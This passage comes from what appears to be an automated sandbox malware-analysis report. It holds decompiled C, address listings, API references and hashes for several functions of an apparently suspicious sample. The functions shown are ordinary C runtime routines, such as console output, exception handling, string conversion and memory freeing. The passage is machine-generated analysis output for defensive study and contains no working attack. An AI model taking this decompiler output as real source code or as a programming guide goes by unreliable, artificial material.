                                                                                                                                      											if(WriteFile(_v44,  &_v32, 1,  &_v36, 0) == 0) {
                                                                                                                                      												goto L19;
                                                                                                                                      											} else {
                                                                                                                                      												if(_v36 >= 1) {
                                                                                                                                      													 *((intOrPtr*)(_t135 + 8)) =  *((intOrPtr*)(_t135 + 8)) + 1;
                                                                                                                                      													 *((intOrPtr*)(_t135 + 4)) =  *((intOrPtr*)(_t135 + 4)) + 1;
                                                                                                                                      													goto L16;
                                                                                                                                      												}
                                                                                                                                      											}
                                                                                                                                      										}
                                                                                                                                      									}
                                                                                                                                      								}
                                                                                                                                      							}
                                                                                                                                      						}
                                                                                                                                      					}
                                                                                                                                      					goto L20;
                                                                                                                                      					L16:
                                                                                                                                      				}
                                                                                                                                      				L20:
                                                                                                                                      				return E0130A07B(_v8 ^ _t136);
                                                                                                                                      			}


































                                                                                                                                      0x0131b88f
                                                                                                                                      0x0131b896
                                                                                                                                      0x0131b899
                                                                                                                                      0x0131b8a1
                                                                                                                                      0x0131b8a5
                                                                                                                                      0x0131b8b1
                                                                                                                                      0x0131b8b4
                                                                                                                                      0x0131b8b7
                                                                                                                                      0x0131b8be
                                                                                                                                      0x0131b8c6
                                                                                                                                      0x0131b8c9
                                                                                                                                      0x0131b8cf
                                                                                                                                      0x0131b8d5
                                                                                                                                      0x0131b8da
                                                                                                                                      0x0131b8dc
                                                                                                                                      0x0131b8df
                                                                                                                                      0x0131b8e4
                                                                                                                                      0x0131b8ee
                                                                                                                                      0x0131b8f5
                                                                                                                                      0x0131b8f8
                                                                                                                                      0x0131b8ff
                                                                                                                                      0x0131b906
                                                                                                                                      0x0131b932
                                                                                                                                      0x0131b958
                                                                                                                                      0x0131b95a
                                                                                                                                      0x00000000
                                                                                                                                      0x0131b934
                                                                                                                                      0x0131b937
                                                                                                                                      0x0131b9fe
                                                                                                                                      0x0131ba0a
                                                                                                                                      0x0131ba15
                                                                                                                                      0x0131ba1a
                                                                                                                                      0x0131b93d
                                                                                                                                      0x0131b944
                                                                                                                                      0x0131b949
                                                                                                                                      0x0131b94f
                                                                                                                                      0x0131b955
                                                                                                                                      0x00000000
                                                                                                                                      0x0131b955
                                                                                                                                      0x0131b94f
                                                                                                                                      0x0131b937
                                                                                                                                      0x0131b908
                                                                                                                                      0x0131b90c
                                                                                                                                      0x0131b90f
                                                                                                                                      0x0131b915
                                                                                                                                      0x0131b917
                                                                                                                                      0x0131b91a
                                                                                                                                      0x0131b91e
                                                                                                                                      0x0131b95b
                                                                                                                                      0x0131b95e
                                                                                                                                      0x0131b95f
                                                                                                                                      0x0131b964
                                                                                                                                      0x0131b96a
                                                                                                                                      0x0131b970
                                                                                                                                      0x0131b97f
                                                                                                                                      0x0131b985
                                                                                                                                      0x0131b98b
                                                                                                                                      0x0131b990
                                                                                                                                      0x0131b9ac
                                                                                                                                      0x0131ba1f
                                                                                                                                      0x0131ba25
                                                                                                                                      0x0131b9ae
                                                                                                                                      0x0131b9b6
                                                                                                                                      0x0131b9bf
                                                                                                                                      0x0131b9c5
                                                                                                                                      0x00000000
                                                                                                                                      0x0131b9c7
                                                                                                                                      0x0131b9c9
                                                                                                                                      0x0131b9cc
                                                                                                                                      0x0131b9e5
                                                                                                                                      0x00000000
                                                                                                                                      0x0131b9e7
                                                                                                                                      0x0131b9eb
                                                                                                                                      0x0131b9ed
                                                                                                                                      0x0131b9f0
                                                                                                                                      0x00000000
                                                                                                                                      0x0131b9f0
                                                                                                                                      0x0131b9eb
                                                                                                                                      0x0131b9e5
                                                                                                                                      0x0131b9c5
                                                                                                                                      0x0131b9bf
                                                                                                                                      0x0131b9ac
                                                                                                                                      0x0131b990
                                                                                                                                      0x0131b96a
                                                                                                                                      0x00000000
                                                                                                                                      0x0131b9f3
                                                                                                                                      0x0131b9f3
                                                                                                                                      0x0131ba27
                                                                                                                                      0x0131ba39

                                                                                                                                      APIs
                                                                                                                                      • GetConsoleCP.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,0131BFFC,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0131B8C9
                                                                                                                                      • __fassign.LIBCMT ref: 0131B944
                                                                                                                                      • __fassign.LIBCMT ref: 0131B95F
                                                                                                                                      • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,00000000,00000005,00000000,00000000), ref: 0131B985
                                                                                                                                      • WriteFile.KERNEL32(?,00000000,00000000,0131BFFC,00000000,?,?,?,?,?,?,?,?,?,0131BFFC,00000000), ref: 0131B9A4
                                                                                                                                      • WriteFile.KERNEL32(?,00000000,00000001,0131BFFC,00000000,?,?,?,?,?,?,?,?,?,0131BFFC,00000000), ref: 0131B9DD
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.505409012.0000000001301000.00000020.00000001.01000000.00000005.sdmp, Offset: 01300000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.505385438.0000000001300000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.505578317.0000000001324000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.505631265.000000000132E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.505681175.0000000001330000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_1300000_hjrypmyqervekvpteu.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 1324828854-0
                                                                                                                                      • Opcode ID: 40c25da5b22fbc4acbbdf8b9bb25f5096c25218e63dbb499c55deb0cd4eb6f6d
                                                                                                                                      • Instruction ID: 4d97677cb1c931e1da85e2b0f42c06efc04213c635e3bcc065216301a59d2415
                                                                                                                                      • Opcode Fuzzy Hash: 40c25da5b22fbc4acbbdf8b9bb25f5096c25218e63dbb499c55deb0cd4eb6f6d
                                                                                                                                      • Instruction Fuzzy Hash: D351D371A002499FDB24CFA8D885AEEFFF9FF09314F14415AE951E7249D730AA51CB60
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      C-Code - Quality: 57%
                                                                                                                                      			E0130C8A0(void* __ebx, void* __edi, void* __esi, void* __eflags, intOrPtr* _a4, intOrPtr _a8, intOrPtr _a12) {
                                                                                                                                      				char _v5;
                                                                                                                                      				signed int _v12;
                                                                                                                                      				char _v16;
                                                                                                                                      				intOrPtr _v20;
                                                                                                                                      				intOrPtr _v24;
                                                                                                                                      				intOrPtr _v28;
                                                                                                                                      				char _v32;
                                                                                                                                      				char _t54;
                                                                                                                                      				signed int _t61;
                                                                                                                                      				intOrPtr _t62;
                                                                                                                                      				void* _t63;
                                                                                                                                      				intOrPtr* _t64;
                                                                                                                                      				intOrPtr _t66;
                                                                                                                                      				intOrPtr _t68;
                                                                                                                                      				signed int _t69;
                                                                                                                                      				signed int _t70;
                                                                                                                                      				signed int _t73;
                                                                                                                                      				intOrPtr _t77;
                                                                                                                                      				intOrPtr _t79;
                                                                                                                                      				signed int _t81;
                                                                                                                                      				char _t83;
                                                                                                                                      				intOrPtr _t87;
                                                                                                                                      				intOrPtr* _t88;
                                                                                                                                      				signed int _t95;
                                                                                                                                      				signed int _t96;
                                                                                                                                      				intOrPtr _t99;
                                                                                                                                      				intOrPtr _t102;
                                                                                                                                      				signed int _t104;
                                                                                                                                      				void* _t107;
                                                                                                                                      				void* _t108;
                                                                                                                                      				void* _t115;
                                                                                                                                      
                                                                                                                                      				_t77 = _a8;
                                                                                                                                      				_push(__edi);
                                                                                                                                      				_v5 = 0;
                                                                                                                                      				_t102 = _t77 + 0x10;
                                                                                                                                      				_push(_t102);
                                                                                                                                      				_v16 = 1;
                                                                                                                                      				_v20 = _t102;
                                                                                                                                      				_v12 =  *(_t77 + 8) ^  *0x132e00c;
                                                                                                                                      				E0130C860(__edi,  *(_t77 + 8) ^  *0x132e00c);
                                                                                                                                      				E0130D87C(_a12);
                                                                                                                                      				_t54 = _a4;
                                                                                                                                      				_t108 = _t107 + 0xc;
                                                                                                                                      				_t99 =  *((intOrPtr*)(_t77 + 0xc));
                                                                                                                                      				if(( *(_t54 + 4) & 0x00000066) != 0) {
                                                                                                                                      					__eflags = _t99 - 0xfffffffe;
                                                                                                                                      					if(_t99 != 0xfffffffe) {
                                                                                                                                      						E0130DD70(_t77, 0xfffffffe, _t102, 0x132e00c);
                                                                                                                                      						goto L14;
                                                                                                                                      					}
                                                                                                                                      					goto L15;
                                                                                                                                      				} else {
                                                                                                                                      					_v32 = _t54;
                                                                                                                                      					_v28 = _a12;
                                                                                                                                      					 *((intOrPtr*)(_t77 - 4)) =  &_v32;
                                                                                                                                      					if(_t99 == 0xfffffffe) {
                                                                                                                                      						L15:
                                                                                                                                      						return _v16;
                                                                                                                                      					} else {
                                                                                                                                      						do {
                                                                                                                                      							_t81 = _v12;
                                                                                                                                      							_t20 = _t99 + 2; // 0x3
                                                                                                                                      							_t61 = _t99 + _t20 * 2;
                                                                                                                                      							_t79 =  *((intOrPtr*)(_t81 + _t61 * 4));
                                                                                                                                      							_t62 = _t81 + _t61 * 4;
                                                                                                                                      							_t82 =  *((intOrPtr*)(_t62 + 4));
                                                                                                                                      							_v24 = _t62;
                                                                                                                                      							if( *((intOrPtr*)(_t62 + 4)) == 0) {
                                                                                                                                      								_t83 = _v5;
                                                                                                                                      								goto L8;
                                                                                                                                      							} else {
                                                                                                                                      								_t63 = E0130DD20(_t82, _t102);
                                                                                                                                      								_t83 = 1;
                                                                                                                                      								_v5 = 1;
                                                                                                                                      								_t115 = _t63;
                                                                                                                                      								if(_t115 < 0) {
                                                                                                                                      									_v16 = 0;
                                                                                                                                      									L14:
                                                                                                                                      									_push(_t102);
                                                                                                                                      									E0130C860(_t99, _v12);
                                                                                                                                      									goto L15;
                                                                                                                                      								} else {
                                                                                                                                      									if(_t115 > 0) {
                                                                                                                                      										_t64 = _a4;
                                                                                                                                      										__eflags =  *_t64 - 0xe06d7363;
                                                                                                                                      										if( *_t64 == 0xe06d7363) {
                                                                                                                                      											__eflags =  *0x1324478;
                                                                                                                                      											if(__eflags != 0) {
                                                                                                                                      												_t73 = E01322820(__eflags, 0x1324478);
                                                                                                                                      												_t108 = _t108 + 4;
                                                                                                                                      												__eflags = _t73;
                                                                                                                                      												if(_t73 != 0) {
                                                                                                                                      													_t104 =  *0x1324478; // 0x130b424
                                                                                                                                      													 *0x132428c(_a4, 1);
                                                                                                                                      													 *_t104();
                                                                                                                                      													_t102 = _v20;
                                                                                                                                      													_t108 = _t108 + 8;
                                                                                                                                      												}
                                                                                                                                      												_t64 = _a4;
                                                                                                                                      											}
                                                                                                                                      										}
                                                                                                                                      										E0130DD54(_t64, _a8, _t64);
                                                                                                                                      										_t66 = _a8;
                                                                                                                                      										__eflags =  *((intOrPtr*)(_t66 + 0xc)) - _t99;
                                                                                                                                      										if( *((intOrPtr*)(_t66 + 0xc)) != _t99) {
                                                                                                                                      											E0130DD70(_t66, _t99, _t102, 0x132e00c);
                                                                                                                                      											_t66 = _a8;
                                                                                                                                      										}
                                                                                                                                      										_push(_t102);
                                                                                                                                      										 *((intOrPtr*)(_t66 + 0xc)) = _t79;
                                                                                                                                      										E0130C860(_t99, _v12);
                                                                                                                                      										E0130DD38();
                                                                                                                                      										asm("int3");
                                                                                                                                      										_t68 = _v32;
                                                                                                                                      										_t87 = _v28;
                                                                                                                                      										__eflags = _t68 - _t87;
                                                                                                                                      										if(_t68 != _t87) {
                                                                                                                                      											_t88 = _t87 + 5;
                                                                                                                                      											_t69 = _t68 + 5;
                                                                                                                                      											__eflags = _t69;
                                                                                                                                      											while(1) {
                                                                                                                                      												_t95 =  *_t69;
                                                                                                                                      												__eflags = _t95 -  *_t88;
                                                                                                                                      												if(_t95 !=  *_t88) {
                                                                                                                                      													break;
                                                                                                                                      												}
                                                                                                                                      												__eflags = _t95;
                                                                                                                                      												if(_t95 == 0) {
                                                                                                                                      													goto L25;
                                                                                                                                      												} else {
                                                                                                                                      													_t96 =  *((intOrPtr*)(_t69 + 1));
                                                                                                                                      													__eflags = _t96 -  *((intOrPtr*)(_t88 + 1));
                                                                                                                                      													if(_t96 !=  *((intOrPtr*)(_t88 + 1))) {
                                                                                                                                      														break;
                                                                                                                                      													} else {
                                                                                                                                      														_t69 = _t69 + 2;
                                                                                                                                      														_t88 = _t88 + 2;
                                                                                                                                      														__eflags = _t96;
                                                                                                                                      														if(_t96 != 0) {
                                                                                                                                      															continue;
                                                                                                                                      														} else {
                                                                                                                                      															goto L25;
                                                                                                                                      														}
                                                                                                                                      													}
                                                                                                                                      												}
                                                                                                                                      												goto L33;
                                                                                                                                      											}
                                                                                                                                      											asm("sbb eax, eax");
                                                                                                                                      											_t70 = _t69 | 0x00000001;
                                                                                                                                      											__eflags = _t70;
                                                                                                                                      											return _t70;
                                                                                                                                      										} else {
                                                                                                                                      											L25:
                                                                                                                                      											__eflags = 0;
                                                                                                                                      											return 0;
                                                                                                                                      										}
                                                                                                                                      									} else {
                                                                                                                                      										goto L8;
                                                                                                                                      									}
                                                                                                                                      								}
                                                                                                                                      							}
                                                                                                                                      							goto L33;
                                                                                                                                      							L8:
                                                                                                                                      							_t99 = _t79;
                                                                                                                                      						} while (_t79 != 0xfffffffe);
                                                                                                                                      						if(_t83 != 0) {
                                                                                                                                      							goto L14;
                                                                                                                                      						}
                                                                                                                                      						goto L15;
                                                                                                                                      					}
                                                                                                                                      				}
                                                                                                                                      				L33:
                                                                                                                                      			}


































                                                                                                                                      0x0130c8a7
                                                                                                                                      0x0130c8ab
                                                                                                                                      0x0130c8ac
                                                                                                                                      0x0130c8b3
                                                                                                                                      0x0130c8bc
                                                                                                                                      0x0130c8be
                                                                                                                                      0x0130c8c5
                                                                                                                                      0x0130c8c8
                                                                                                                                      0x0130c8cb
                                                                                                                                      0x0130c8d3
                                                                                                                                      0x0130c8d8
                                                                                                                                      0x0130c8db
                                                                                                                                      0x0130c8de
                                                                                                                                      0x0130c8e5
                                                                                                                                      0x0130c946
                                                                                                                                      0x0130c949
                                                                                                                                      0x0130c958
                                                                                                                                      0x00000000
                                                                                                                                      0x0130c958
                                                                                                                                      0x00000000
                                                                                                                                      0x0130c8e7
                                                                                                                                      0x0130c8e7
                                                                                                                                      0x0130c8ed
                                                                                                                                      0x0130c8f3
                                                                                                                                      0x0130c8f9
                                                                                                                                      0x0130c969
                                                                                                                                      0x0130c972
                                                                                                                                      0x0130c8fb
                                                                                                                                      0x0130c900
                                                                                                                                      0x0130c900
                                                                                                                                      0x0130c903
                                                                                                                                      0x0130c906
                                                                                                                                      0x0130c909
                                                                                                                                      0x0130c90c
                                                                                                                                      0x0130c90f
                                                                                                                                      0x0130c912
                                                                                                                                      0x0130c917
                                                                                                                                      0x0130c92d
                                                                                                                                      0x00000000
                                                                                                                                      0x0130c919
                                                                                                                                      0x0130c91b
                                                                                                                                      0x0130c920
                                                                                                                                      0x0130c922
                                                                                                                                      0x0130c925
                                                                                                                                      0x0130c927
                                                                                                                                      0x0130c93d
                                                                                                                                      0x0130c95d
                                                                                                                                      0x0130c95d
                                                                                                                                      0x0130c961
                                                                                                                                      0x00000000
                                                                                                                                      0x0130c929
                                                                                                                                      0x0130c929
                                                                                                                                      0x0130c973
                                                                                                                                      0x0130c976
                                                                                                                                      0x0130c97c
                                                                                                                                      0x0130c97e
                                                                                                                                      0x0130c985
                                                                                                                                      0x0130c98c
                                                                                                                                      0x0130c991
                                                                                                                                      0x0130c994
                                                                                                                                      0x0130c996
                                                                                                                                      0x0130c998
                                                                                                                                      0x0130c9a5
                                                                                                                                      0x0130c9ab
                                                                                                                                      0x0130c9ad
                                                                                                                                      0x0130c9b0
                                                                                                                                      0x0130c9b0
                                                                                                                                      0x0130c9b3
                                                                                                                                      0x0130c9b3
                                                                                                                                      0x0130c985
                                                                                                                                      0x0130c9bb
                                                                                                                                      0x0130c9c0
                                                                                                                                      0x0130c9c3
                                                                                                                                      0x0130c9c6
                                                                                                                                      0x0130c9d2
                                                                                                                                      0x0130c9d7
                                                                                                                                      0x0130c9d7
                                                                                                                                      0x0130c9da
                                                                                                                                      0x0130c9de
                                                                                                                                      0x0130c9e1
                                                                                                                                      0x0130c9f1
                                                                                                                                      0x0130c9f6
                                                                                                                                      0x0130c9fa
                                                                                                                                      0x0130c9fd
                                                                                                                                      0x0130ca00
                                                                                                                                      0x0130ca02
                                                                                                                                      0x0130ca08
                                                                                                                                      0x0130ca0b
                                                                                                                                      0x0130ca0b
                                                                                                                                      0x0130ca0e
                                                                                                                                      0x0130ca0e
                                                                                                                                      0x0130ca10
                                                                                                                                      0x0130ca12
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x0130ca14
                                                                                                                                      0x0130ca16
                                                                                                                                      0x00000000
                                                                                                                                      0x0130ca18
                                                                                                                                      0x0130ca18
                                                                                                                                      0x0130ca1b
                                                                                                                                      0x0130ca1e
                                                                                                                                      0x00000000
                                                                                                                                      0x0130ca20
                                                                                                                                      0x0130ca20
                                                                                                                                      0x0130ca23
                                                                                                                                      0x0130ca26
                                                                                                                                      0x0130ca28
                                                                                                                                      0x00000000
                                                                                                                                      0x0130ca2a
                                                                                                                                      0x00000000
                                                                                                                                      0x0130ca2a
                                                                                                                                      0x0130ca28
                                                                                                                                      0x0130ca1e
                                                                                                                                      0x00000000
                                                                                                                                      0x0130ca16
                                                                                                                                      0x0130ca2c
                                                                                                                                      0x0130ca2e
                                                                                                                                      0x0130ca2e
                                                                                                                                      0x0130ca32
                                                                                                                                      0x0130ca04
                                                                                                                                      0x0130ca04
                                                                                                                                      0x0130ca04
                                                                                                                                      0x0130ca07
                                                                                                                                      0x0130ca07
                                                                                                                                      0x0130c92b
                                                                                                                                      0x00000000
                                                                                                                                      0x0130c92b
                                                                                                                                      0x0130c929
                                                                                                                                      0x0130c927
                                                                                                                                      0x00000000
                                                                                                                                      0x0130c930
                                                                                                                                      0x0130c930
                                                                                                                                      0x0130c932
                                                                                                                                      0x0130c939
                                                                                                                                      0x00000000
                                                                                                                                      0x0130c93b
                                                                                                                                      0x00000000
                                                                                                                                      0x0130c939
                                                                                                                                      0x0130c8f9
                                                                                                                                      0x00000000

                                                                                                                                      APIs
                                                                                                                                      • _ValidateLocalCookies.LIBCMT ref: 0130C8CB
                                                                                                                                      • ___except_validate_context_record.LIBVCRUNTIME ref: 0130C8D3
                                                                                                                                      • _ValidateLocalCookies.LIBCMT ref: 0130C961
                                                                                                                                      • __IsNonwritableInCurrentImage.LIBCMT ref: 0130C98C
                                                                                                                                      • _ValidateLocalCookies.LIBCMT ref: 0130C9E1
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.505409012.0000000001301000.00000020.00000001.01000000.00000005.sdmp, Offset: 01300000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.505385438.0000000001300000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.505578317.0000000001324000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.505631265.000000000132E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.505681175.0000000001330000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_1300000_hjrypmyqervekvpteu.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                                                                                                      • String ID: csm
                                                                                                                                      • API String ID: 1170836740-1018135373
                                                                                                                                      • Opcode ID: ffe0f8ed7e797fa895480a666f8ddc8385ddf96b205b74697a97aaeb2539f206
                                                                                                                                      • Instruction ID: 9a3e44af9926b15d2e27d18f8b9a5a8ca1091bef5a95f09a7e4c920f9ecdd3c4
                                                                                                                                      • Opcode Fuzzy Hash: ffe0f8ed7e797fa895480a666f8ddc8385ddf96b205b74697a97aaeb2539f206
                                                                                                                                      • Instruction Fuzzy Hash: BB41D734A002099BCF12DF6DC8A4A9E7FF5AF4532CF149295E9146B3D1D731DA05CB90
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      C-Code - Quality: 90%
                                                                                                                                      			E013200EA(char* _a4, short* _a8) {
                                                                                                                                      				int _v8;
                                                                                                                                      				void* __ecx;
                                                                                                                                      				void* __esi;
                                                                                                                                      				short* _t10;
                                                                                                                                      				short* _t14;
                                                                                                                                      				int _t15;
                                                                                                                                      				short* _t16;
                                                                                                                                      				void* _t26;
                                                                                                                                      				int _t27;
                                                                                                                                      				void* _t29;
                                                                                                                                      				short* _t35;
                                                                                                                                      				short* _t39;
                                                                                                                                      				short* _t40;
                                                                                                                                      
                                                                                                                                      				_push(_t29);
                                                                                                                                      				if(_a4 != 0) {
                                                                                                                                      					_t39 = _a8;
                                                                                                                                      					__eflags = _t39;
                                                                                                                                      					if(__eflags != 0) {
                                                                                                                                      						_push(_t26);
                                                                                                                                      						E01314780(_t29, _t39, __eflags);
                                                                                                                                      						asm("sbb ebx, ebx");
                                                                                                                                      						_t35 = 0;
                                                                                                                                      						_t27 = _t26 + 1;
                                                                                                                                      						 *_t39 = 0;
                                                                                                                                      						_t10 = MultiByteToWideChar(_t27, 0, _a4, 0xffffffff, 0, 0);
                                                                                                                                      						_v8 = _t10;
                                                                                                                                      						__eflags = _t10;
                                                                                                                                      						if(_t10 != 0) {
                                                                                                                                      							_t40 = E013151CD(_t29, _t10 + _t10);
                                                                                                                                      							__eflags = _t40;
                                                                                                                                      							if(_t40 != 0) {
                                                                                                                                      								_t15 = MultiByteToWideChar(_t27, 0, _a4, 0xffffffff, _t40, _v8);
                                                                                                                                      								__eflags = _t15;
                                                                                                                                      								if(_t15 != 0) {
                                                                                                                                      									_t16 = _t40;
                                                                                                                                      									_t40 = 0;
                                                                                                                                      									_t35 = 1;
                                                                                                                                      									__eflags = 1;
                                                                                                                                      									 *_a8 = _t16;
                                                                                                                                      								} else {
                                                                                                                                      									E01313C9B(GetLastError());
                                                                                                                                      								}
                                                                                                                                      							}
                                                                                                                                      							E01314615(_t40);
                                                                                                                                      							_t14 = _t35;
                                                                                                                                      						} else {
                                                                                                                                      							E01313C9B(GetLastError());
                                                                                                                                      							_t14 = 0;
                                                                                                                                      						}
                                                                                                                                      					} else {
                                                                                                                                      						 *((intOrPtr*)(E01313CD1())) = 0x16;
                                                                                                                                      						E013110B9();
                                                                                                                                      						_t14 = 0;
                                                                                                                                      					}
                                                                                                                                      					return _t14;
                                                                                                                                      				}
                                                                                                                                      				 *((intOrPtr*)(E01313CD1())) = 0x16;
                                                                                                                                      				E013110B9();
                                                                                                                                      				return 0;
                                                                                                                                      			}
















                                                                                                                                      0x013200ef
                                                                                                                                      0x013200f4
                                                                                                                                      0x0132010e
                                                                                                                                      0x01320111
                                                                                                                                      0x01320113
                                                                                                                                      0x0132012c
                                                                                                                                      0x0132012e
                                                                                                                                      0x01320135
                                                                                                                                      0x01320137
                                                                                                                                      0x01320140
                                                                                                                                      0x01320141
                                                                                                                                      0x01320145
                                                                                                                                      0x0132014b
                                                                                                                                      0x0132014e
                                                                                                                                      0x01320150
                                                                                                                                      0x0132016a
                                                                                                                                      0x0132016d
                                                                                                                                      0x0132016f
                                                                                                                                      0x0132017c
                                                                                                                                      0x01320182
                                                                                                                                      0x01320184
                                                                                                                                      0x01320198
                                                                                                                                      0x0132019a
                                                                                                                                      0x0132019e
                                                                                                                                      0x0132019e
                                                                                                                                      0x0132019f
                                                                                                                                      0x01320186
                                                                                                                                      0x0132018d
                                                                                                                                      0x01320192
                                                                                                                                      0x01320184
                                                                                                                                      0x013201a2
                                                                                                                                      0x013201a7
                                                                                                                                      0x01320152
                                                                                                                                      0x01320159
                                                                                                                                      0x0132015e
                                                                                                                                      0x0132015e
                                                                                                                                      0x01320115
                                                                                                                                      0x0132011a
                                                                                                                                      0x01320120
                                                                                                                                      0x01320125
                                                                                                                                      0x01320125
                                                                                                                                      0x00000000
                                                                                                                                      0x013201ac
                                                                                                                                      0x013200fb
                                                                                                                                      0x01320101
                                                                                                                                      0x00000000

                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.505409012.0000000001301000.00000020.00000001.01000000.00000005.sdmp, Offset: 01300000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.505385438.0000000001300000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.505578317.0000000001324000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.505631265.000000000132E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.505681175.0000000001330000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_1300000_hjrypmyqervekvpteu.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: 379ca7585355a8ee4e8cb805a4460bb6ab8c8bbfaaa69e9f2a9eb5846d59c852
                                                                                                                                      • Instruction ID: ebe88131e4665d712e4b46d060798b2e09cfa79c47d76f9b631276fbffad33ac
                                                                                                                                      • Opcode Fuzzy Hash: 379ca7585355a8ee4e8cb805a4460bb6ab8c8bbfaaa69e9f2a9eb5846d59c852
                                                                                                                                      • Instruction Fuzzy Hash: 9011D67560412ABFDB293F7ADC0496B7A9CEFD2778B204618F811D7244EA309800C760
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      C-Code - Quality: 100%
                                                                                                                                      			E0131AB9E(intOrPtr _a4) {
                                                                                                                                      				void* _t18;
                                                                                                                                      
                                                                                                                                      				_t45 = _a4;
                                                                                                                                      				if(_a4 != 0) {
                                                                                                                                      					E0131AB62(_t45, 7);
                                                                                                                                      					E0131AB62(_t45 + 0x1c, 7);
                                                                                                                                      					E0131AB62(_t45 + 0x38, 0xc);
                                                                                                                                      					E0131AB62(_t45 + 0x68, 0xc);
                                                                                                                                      					E0131AB62(_t45 + 0x98, 2);
                                                                                                                                      					E01314615( *((intOrPtr*)(_t45 + 0xa0)));
                                                                                                                                      					E01314615( *((intOrPtr*)(_t45 + 0xa4)));
                                                                                                                                      					E01314615( *((intOrPtr*)(_t45 + 0xa8)));
                                                                                                                                      					E0131AB62(_t45 + 0xb4, 7);
                                                                                                                                      					E0131AB62(_t45 + 0xd0, 7);
                                                                                                                                      					E0131AB62(_t45 + 0xec, 0xc);
                                                                                                                                      					E0131AB62(_t45 + 0x11c, 0xc);
                                                                                                                                      					E0131AB62(_t45 + 0x14c, 2);
                                                                                                                                      					E01314615( *((intOrPtr*)(_t45 + 0x154)));
                                                                                                                                      					E01314615( *((intOrPtr*)(_t45 + 0x158)));
                                                                                                                                      					E01314615( *((intOrPtr*)(_t45 + 0x15c)));
                                                                                                                                      					return E01314615( *((intOrPtr*)(_t45 + 0x160)));
                                                                                                                                      				}
                                                                                                                                      				return _t18;
                                                                                                                                      			}




                                                                                                                                      0x0131aba4
                                                                                                                                      0x0131aba9
                                                                                                                                      0x0131abb2
                                                                                                                                      0x0131abbd
                                                                                                                                      0x0131abc8
                                                                                                                                      0x0131abd3
                                                                                                                                      0x0131abe1
                                                                                                                                      0x0131abec
                                                                                                                                      0x0131abf7
                                                                                                                                      0x0131ac02
                                                                                                                                      0x0131ac10
                                                                                                                                      0x0131ac1e
                                                                                                                                      0x0131ac2f
                                                                                                                                      0x0131ac3d
                                                                                                                                      0x0131ac4b
                                                                                                                                      0x0131ac56
                                                                                                                                      0x0131ac61
                                                                                                                                      0x0131ac6c
                                                                                                                                      0x00000000
                                                                                                                                      0x0131ac7c
                                                                                                                                      0x0131ac81

                                                                                                                                      APIs
                                                                                                                                        • Part of subcall function 0131AB62: _free.LIBCMT ref: 0131AB8B
                                                                                                                                      • _free.LIBCMT ref: 0131ABEC
                                                                                                                                        • Part of subcall function 01314615: HeapFree.KERNEL32(00000000,00000000,?,0131AB90,?,00000000,?,00000000,?,0131ABB7,?,00000007,?,?,0131AFB4,?), ref: 0131462B
                                                                                                                                        • Part of subcall function 01314615: GetLastError.KERNEL32(?,?,0131AB90,?,00000000,?,00000000,?,0131ABB7,?,00000007,?,?,0131AFB4,?,?), ref: 0131463D
                                                                                                                                      • _free.LIBCMT ref: 0131ABF7
                                                                                                                                      • _free.LIBCMT ref: 0131AC02
                                                                                                                                      • _free.LIBCMT ref: 0131AC56
                                                                                                                                      • _free.LIBCMT ref: 0131AC61
                                                                                                                                      • _free.LIBCMT ref: 0131AC6C
                                                                                                                                      • _free.LIBCMT ref: 0131AC77
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.505409012.0000000001301000.00000020.00000001.01000000.00000005.sdmp, Offset: 01300000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.505385438.0000000001300000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.505578317.0000000001324000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.505631265.000000000132E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.505681175.0000000001330000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
